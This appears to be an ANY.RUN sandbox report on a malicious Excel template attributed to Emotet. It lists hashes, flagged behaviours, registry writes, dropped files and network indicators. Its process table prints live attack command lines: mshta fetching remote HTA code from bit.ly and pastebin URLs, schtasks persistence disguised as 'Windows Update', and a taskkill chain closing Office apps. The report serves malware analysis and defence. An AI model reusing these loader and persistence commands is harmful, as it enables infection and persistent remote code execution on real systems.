| File name: | Specifications___9927265.xlt |
| Full analysis: | https://app.any.run/tasks/8138b543-80bd-4122-a214-49c02fd0e482 |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | September 11, 2019, 09:39:36 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: mana zaheer, Last Saved By: mana zaheer, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Sep 10 08:54:29 2019, Last Saved Time/Date: Tue Sep 10 08:55:13 2019, Security: 0 |
| MD5: | 9D41CAA6DE6CEB6FBEEC9142496F9F89 |
| SHA1: | A1056E4279D9DC1AAB97A20548628794424F5D8E |
| SHA256: | 88FA4316062F115BDA55F5EE813F142F656F4C93C080E3EAFC2489BCF484A72C |
| SSDEEP: | 1536:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAVLviN5y7Mersnd/rH3FCXsqQjbfhgBJ:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NS |
MALICIOUS
Starts MSHTA.EXE for opening HTA or HTMLS files
- EXCEL.EXE (PID: 3432)
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 3432)
Changes the autorun value in the registry
- mshta.exe (PID: 3924)
Uses Task Scheduler to run other applications
- mshta.exe (PID: 3924)
Loads the Task Scheduler COM API
- schtasks.exe (PID: 2540)
- schtasks.exe (PID: 2288)
SUSPICIOUS
Creates files in the user directory
- mshta.exe (PID: 2608)
- mshta.exe (PID: 3924)
Starts MSHTA.EXE for opening HTA or HTMLS files
- mshta.exe (PID: 2608)
Application launched itself
- mshta.exe (PID: 2608)
Starts CMD.EXE for commands execution
- mshta.exe (PID: 3924)
Uses TASKKILL.EXE to kill Office Apps
- cmd.exe (PID: 1008)
Uses TASKKILL.EXE to kill process
- cmd.exe (PID: 1008)
INFO
Reads Microsoft Office registry keys
- EXCEL.EXE (PID: 3432)
Reads internet explorer settings
- mshta.exe (PID: 2608)
- mshta.exe (PID: 3924)
Creates files in the user directory
- EXCEL.EXE (PID: 3432)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xls | | | Microsoft Excel sheet (48) |
|---|---|---|
| .xls | | | Microsoft Excel sheet (alternate) (39.2) |
EXIF
FlashPix
| Author: | mana zaheer |
|---|---|
| LastModifiedBy: | mana zaheer |
| Software: | Microsoft Excel |
| CreateDate: | 2019:09:10 07:54:29 |
| ModifyDate: | 2019:09:10 07:55:13 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | Sheet1 |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Excel 2003 Worksheet |
Total processes
47
Monitored processes
10
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1008 | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2204 | taskkill /f /im POWERPNT.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2288 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "Windows Update" /tr "mshta.exe http://pastebin.com/raw/W1fzJNbg" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2540 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Update" /tr "mshta.exe http://pastebin.com/raw/Gt93FF9X" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2608 | mshta http://bit.ly/mylunlenahaiakslagaaki | C:\Windows\system32\mshta.exe | EXCEL.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3132 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3280 | taskkill /f /im MSPUB.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3432 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3724 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3924 | "C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/eS9WmF3u | C:\Windows\System32\mshta.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
761
Read events
700
Write events
54
Delete events
7
Modification events
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | m&$ |
Value: 6D262400680D0000010000000000000000000000 | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
| Operation: | write | Name: | MTTT |
Value: 680D00005CD0C8DC8468D50100000000 | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | delete value | Name: | m&$ |
Value: 6D262400680D0000010000000000000000000000 | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | delete key | Name: | |
Value: | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
| Operation: | delete key | Name: | |
Value: | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (3432) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\16A118 |
| Operation: | write | Name: | 16A118 |
Value: 04000000680D00003700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00530070006500630069006600690063006100740069006F006E0073005F005F005F0039003900320037003200360035002E0078006C0074002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000B00520DE8468D50118A1160018A1160000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
Executable files
0
Suspicious files
1
Text files
15
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3432 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9ADD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css | — | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3704929657-widgets[1].js | — | |
MD5:— | SHA256:— | |||
| 3432 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFACE0084D7BA3C322.TMP | — | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt | text | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\95993233-ieretrofit[1].js | html | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js | html | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\cb=gapi[1].loaded_1 | text | |
MD5:— | SHA256:— | |||
| 2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js | html | |
MD5:— | SHA256:— | |||
| 3432 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
12
DNS requests
10
Threats
2
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2608 | mshta.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/mylunlenahaiakslagaaki | US | html | 140 b | shared |
3924 | mshta.exe | GET | 301 | 104.20.209.21:80 | http://www.pastebin.com/raw/eS9WmF3u | US | html | 721 b | shared |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2608 | mshta.exe | 67.199.248.11:80 | bit.ly | Bitly Inc | US | shared |
2608 | mshta.exe | 172.217.16.169:443 | www.blogger.com | Google Inc. | US | whitelisted |
2608 | mshta.exe | 216.58.207.34:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
2608 | mshta.exe | 216.58.205.238:443 | apis.google.com | Google Inc. | US | whitelisted |
3924 | mshta.exe | 104.20.208.21:443 | www.pastebin.com | Cloudflare Inc | US | shared |
2608 | mshta.exe | 172.217.22.45:443 | accounts.google.com | Google Inc. | US | whitelisted |
3924 | mshta.exe | 104.20.209.21:80 | www.pastebin.com | Cloudflare Inc | US | shared |
2608 | mshta.exe | 172.217.23.161:443 | myownteammana.blogspot.com | Google Inc. | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
bit.ly |
| shared |
myownteammana.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
apis.google.com |
| whitelisted |
pagead2.googlesyndication.com |
| whitelisted |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
www.pastebin.com |
| shared |
pastebin.com |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2608 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3924 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |